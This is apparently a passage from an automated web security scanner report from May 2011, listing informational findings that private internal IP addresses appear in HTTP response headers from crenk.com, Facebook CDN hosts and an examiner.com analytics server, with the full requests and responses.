Content-Type: image/png
Last-Modified: Thu, 14 Apr 2011 08:50:16 GMT
Content-Length: 99037
Date: Thu, 12 May 2011 13:28:47 GMT
X-Varnish: 2340985704 2340954324
Age: 160
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR.......}............    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
17.25. http://crenk.com/wp-includes/images/blank.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-includes/images/blank.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-includes/images/blank.gif HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/gif
Last-Modified: Wed, 27 Apr 2011 13:58:14 GMT
Content-Length: 43
Date: Thu, 12 May 2011 13:29:18 GMT
X-Varnish: 2340991844 2340945857
Age: 237
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

GIF89a.............!...
...,...........L..;
17.26. http://platform.ak.fbcdn.net/www/app_full_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /www/app_full_proxy.php?app=45439413586&v=1&size=z&cksum=43424bb8f3b6b4c9513b39c06ca81a71&src=http%3A%2F%2Fwww.hnedata.net%2Fassets%2Flocal_story_media%2FPower_Play_1305147918%2F_dsc8297_thumb.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/connect/connect.php?id=49133838740&connections=10&stream=1&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.112.116
X-Cnection: close
Content-Length: 6622
Cache-Control: public, max-age=31477851
Expires: Thu, 10 May 2012 21:22:47 GMT
Date: Thu, 12 May 2011 13:31:56 GMT
Connection: close

......JFIF.....H.H......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...
17.27. http://platform.ak.fbcdn.net/www/app_full_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /www/app_full_proxy.php?app=45439413586&v=1&size=z&cksum=aabee72846b83cfd8c30f5650b5b3d48&src=http%3A%2F%2Fwww.hnedata.net%2Fassets%2Flocal_story_media%2Fyouth_nonprofit_1305157890%2F052110_shirley_thumb.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/connect/connect.php?id=49133838740&connections=10&stream=1&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.27.186.115
X-Cnection: close
Content-Length: 5827
Cache-Control: public, max-age=31487550
Expires: Fri, 11 May 2012 00:06:24 GMT
Date: Thu, 12 May 2011 13:33:54 GMT
Connection: close

......JFIF.....H.H......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...
17.28. http://platform.ak.fbcdn.net/www/app_full_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /www/app_full_proxy.php?app=45439413586&v=1&size=z&cksum=4a8666ab4689901fd44b9997ef58cef6&src=http%3A%2F%2Fwww.hnedata.net%2Fassets%2Flocal_story_media%2Fcell_phones_1305158395%2F051211-911_calls-3_thumb.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/connect/connect.php?id=49133838740&connections=10&stream=1&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.54.125.32
X-Cnection: close
Content-Length: 5761
Cache-Control: public, max-age=31490752
Expires: Fri, 11 May 2012 00:57:48 GMT
Date: Thu, 12 May 2011 13:31:56 GMT
Connection: close

......JFIF.....H.H......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...
17.29. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1086
Expires: Thu, 12 May 2011 13:47:02 GMT
Date: Thu, 12 May 2011 13:28:56 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
17.30. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y1/r/ZAHAqkTqkUj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y1/r/ZAHAqkTqkUj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=zdnet.com&width=300&height=350&header=false&colorscheme=light&recommendations=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:31 GMT
X-FB-Server: 10.138.16.182
Vary: Accept-Encoding
Cache-Control: public, max-age=31423077
Expires: Thu, 10 May 2012 06:06:24 GMT
Date: Thu, 12 May 2011 13:28:27 GMT
Connection: close
Content-Length: 26456

/*1305093989,176820406*/

body.fan_widget{background:transparent}
.fbDarkWidget .fan_box{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background:w
...[SNIP]...
17.31. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/8jsqXuInNCS.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y3/r/8jsqXuInNCS.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y3/r/8jsqXuInNCS.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df4fd8bba4%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&locale=en_US&numposts=10&sdk=joey&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 09 May 2011 02:22:58 GMT
X-FB-Server: 10.138.69.183
Vary: Accept-Encoding
Cache-Control: public, max-age=31237623
Expires: Tue, 08 May 2012 02:38:49 GMT
Date: Thu, 12 May 2011 13:31:46 GMT
Connection: close
Content-Length: 3697

/*1304908678,176833975*/

if (window.CavalryLogger) { CavalryLogger.start_js(["pdgj7"]); }

var ChatOnlineFriends=window.ChatOnlineFriends||{chatFriends:{},chatStatuses:['chatOnline','chatIdle','chatO
...[SNIP]...
17.32. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/irfZ-ZFdjLY.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yN/r/irfZ-ZFdjLY.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yN/r/irfZ-ZFdjLY.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df4fd8bba4%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&locale=en_US&numposts=10&sdk=joey&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 03 May 2011 02:32:31 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31371947
Expires: Wed, 09 May 2012 15:57:34 GMT
Date: Thu, 12 May 2011 13:31:47 GMT
Connection: close
Content-Length: 4921

/*1305043014,169775556*/

if (window.CavalryLogger) { CavalryLogger.start_js(["QQwDs"]); }

ConnectLogin={init:function(a){this.appID=a.appID;this.oneClick=a.oneClick;XD.init(a);},login:function(a,c,b
...[SNIP]...
17.33. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/yhiZPPsJHzF.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yN/r/yhiZPPsJHzF.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yN/r/yhiZPPsJHzF.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df4fd8bba4%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&locale=en_US&numposts=10&sdk=joey&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 09 May 2011 02:24:31 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31237530
Expires: Tue, 08 May 2012 02:37:14 GMT
Date: Thu, 12 May 2011 13:31:44 GMT
Connection: close
Content-Length: 26147

/*1304908565,169776317*/

.fbChatBuddyListTypeahead .throbber{display:none;position:absolute;margin-top:-5px;right:6px;top:50%}
.fbChatBuddyListTypeahead.respond .clear,
.fbChatBuddyListTypeahead.resp
...[SNIP]...
17.34. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/-bv7QJTbOXU.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yU/r/-bv7QJTbOXU.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yU/r/-bv7QJTbOXU.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df31fd403fc%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=625
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:16 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31477239
Expires: Thu, 10 May 2012 21:09:45 GMT
Date: Thu, 12 May 2011 13:29:06 GMT
Connection: close
Content-Length: 6869

/*1305148186,169776318*/

.fbSendButton{display:inline-block}
#LikePluginPagelet .fbSendButton{display:block}
.fbSendButton .btnLink{display:block;white-space:nowrap;line-height:14px}
.fbSendButtonBig
...[SNIP]...
17.35. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/EEmuV3MlHAh.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yW/r/EEmuV3MlHAh.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yW/r/EEmuV3MlHAh.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df4fd8bba4%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&locale=en_US&numposts=10&sdk=joey&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31371835
Expires: Wed, 09 May 2012 15:55:39 GMT
Date: Thu, 12 May 2011 13:31:44 GMT
Connection: close
Content-Length: 422

/*1305043034,169776320*/

.sp_15o374{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/y8Fbpkboc3u.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_c6bc
...[SNIP]...
17.36. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uxGNY7N_95r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/uxGNY7N_95r.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/uxGNY7N_95r.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df31fd403fc%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=625
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 06 May 2011 00:23:12 GMT
X-FB-Server: 10.138.64.183
Vary: Accept-Encoding
Cache-Control: public, max-age=31372177
Expires: Wed, 09 May 2012 15:58:49 GMT
Date: Thu, 12 May 2011 13:29:12 GMT
Connection: close
Content-Length: 55363

/*1305043033,176832695*/

if (window.CavalryLogger) { CavalryLogger.start_js(["qEipN"]); }

WindowComm={_callbacks:{},makeHandler:function(a,c){c=c||'opener';var b='f'+(Math.random()*(1<<30)).toString
...[SNIP]...
17.37. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/8OjmYm2TiWI.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yw/r/8OjmYm2TiWI.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yw/r/8OjmYm2TiWI.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df4fd8bba4%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&locale=en_US&numposts=10&sdk=joey&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 11 May 2011 20:49:41 GMT
X-FB-Server: 10.138.17.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31476659
Expires: Thu, 10 May 2012 21:02:44 GMT
Date: Thu, 12 May 2011 13:31:45 GMT
Connection: close
Content-Length: 136629

/*1305147725,176820665*/

if (window.CavalryLogger) { CavalryLogger.start_js(["Kxm3w"]); }

function Poller(b,a){this.setTimePeriod(b);this._requestCallback=a;this.scheduleRequest();}Poller.MIN_TIME_P
...[SNIP]...
17.38. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yx/r/L-db0ALpEr8.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yx/r/L-db0ALpEr8.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=zdnet.com&width=300&height=350&header=false&colorscheme=light&recommendations=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 10 May 2011 05:43:30 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31340569
Expires: Wed, 09 May 2012 07:11:19 GMT
Date: Thu, 12 May 2011 13:28:30 GMT
Connection: close
Content-Length: 60989

/*1305011557,169776320*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dO6dA"]); }

WidgetArbiter={_findSiblings:function(){if(WidgetArbiter._siblings)return;WidgetArbiter._siblings=[];for(var
...[SNIP]...
17.39. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.examiner.com
Path:   /b/ss/examinercom/1/H.21/s24557034953031

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /b/ss/examinercom/1/H.21/s24557034953031?AQB=1&ndh=1&t=12/4/2011%208%3A30%3A37%204%20300&ce=ISO-8859-1&ns=examinercom&pageName=Examiner%20Article&g=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&cc=USD&ch=Sports&server=192.168.1.55&events=event4%2Cevent15%2Cevent5&c1=Fight%20Sports&h1=National%3ASports%3AFight%20Sports%3AFight%20Sports&c4=ARTICLE%20EXENTRY%3A33045071&v4=ARTICLE%20EXENTRY%3A33045071&c5=Complete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20%27face%27%20and%20new%20feuds&v5=National&c6=Rick%20Rockwell&v6=National&c7=EXID%3A21442%20Fight%20Sports%20Examiner&c8=EXID%3A21442&c9=11&c10=National&c11=National&v11=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c12=story&c13=y2011m05d11&c14=Fight%20Sports&v16=7%3A00AM&c17=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&v17=Thursday&c18=7%3A00AM&v18=Weekday&c19=Thursday&c20=Weekday&c21=First%20Visit&c22=Fight%20Sports%20Examiner&c23=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c24=1501231&c25=National&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: stats.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXAMINEREDITION=921; __utmz=109783377.1305207036.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109783377.2080855934.1305207036.1305207036.1305207036.1; __utmc=109783377; __utmb=109783377.1.10.1305207036; s_cc=true; s_visit=1; s_lv=1305207037528; s_lv_s=First%20Visit; s_dlv=First%20Visit

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5F0A8051D189A-40000126E0002357[CE]; Expires=Tue, 10 May 2016 13:32:00 GMT; Domain=.examiner.com; Path=/
Location: http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031?AQB=1&pccr=true&vidn=26E5F0A8051D189A-40000126E0002357&&ndh=1&t=12/4/2011%208%3A30%3A37%204%20300&ce=ISO-8859-1&ns=examinercom&pageName=Examiner%20Article&g=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&cc=USD&ch=Sports&server=192.168.1.55&events=event4%2Cevent15%2Cevent5&c1=Fight%20Sports&h1=National%3ASports%3AFight%20Sports%3AFight%20Sports&c4=ARTICLE%20EXENTRY%3A33045071&v4=ARTICLE%20EXENTRY%3A33045071&c5=Complete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20%27face%27%20and%20new%20feuds&v5=National&c6=Rick%20Rockwell&v6=National&c7=EXID%3A21442%20Fight%20Sports%20Examiner&c8=EXID%3A21442&c9=11&c10=National&c11=National&v11=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c12=story&c13=y2011m05d11&c14=Fight%20Sports&v16=7%3A00AM&c17=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&v17=Thursday&c18=7%3A00AM&v18=Weekday&c19=Thursday&c20=Weekday&c21=First%20Visit&c22=Fight%20Sports%20Examiner&c23=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c24=1501231&c25=National&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
